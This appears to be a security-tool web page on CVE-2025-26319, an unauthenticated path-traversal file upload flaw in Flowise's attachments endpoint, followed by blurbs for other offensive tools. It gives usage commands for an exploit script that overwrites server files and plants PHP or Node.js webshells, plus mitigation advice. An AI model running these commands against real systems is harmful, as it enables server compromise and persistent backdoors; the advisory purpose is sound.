CVE-2025-26319 is a critical vulnerability affecting FlowiseAI Flowise versions up to and including 2.2.6.
This vulnerability allows attackers to perform arbitrary file uploads, potentially leading to remote code execution, server compromise, and unauthorized access to sensitive data.
/api/v1/attachments
endpoint, which lacks proper validation of user-supplied parameters.flowise_exploit.py
python flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txt
python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json
python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php
python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js
The attack exploits the /api/v1/attachments
route, which is accessible without authentication. By manipulating the chatId
parameter, attackers can perform path traversal (../../../
) to upload arbitrary files to any location on the server’s file system.
To mitigate this vulnerability, users should upgrade FlowiseAI Flowise to version 2.2.7 or later.
Additional measures include restricting file uploads, implementing strict file type and size filtering, using allowlists for permitted file extensions, and configuring web application firewall (WAF) rules.
KrbRelayEx is a sophisticated tool designed for performing Man-in-the-Middle (MitM) attacks by relaying Kerberos AP-REQ…
remotePad is a versatile plugin for the GoldHEN platform, designed to enhance the gaming experience…
The ps5-pup-decrypt tool is a utility designed to decrypt PlayStation 5 (PS5) firmware update files,…
Impacket is a powerful collection of Python classes designed to work with various network protocols,…
As Large Language Models (LLMs) become increasingly integral to various applications, ensuring their security is…
strongR-frida-android is a project that builds upon the popular dynamic instrumentation toolkit, Frida, by incorporating…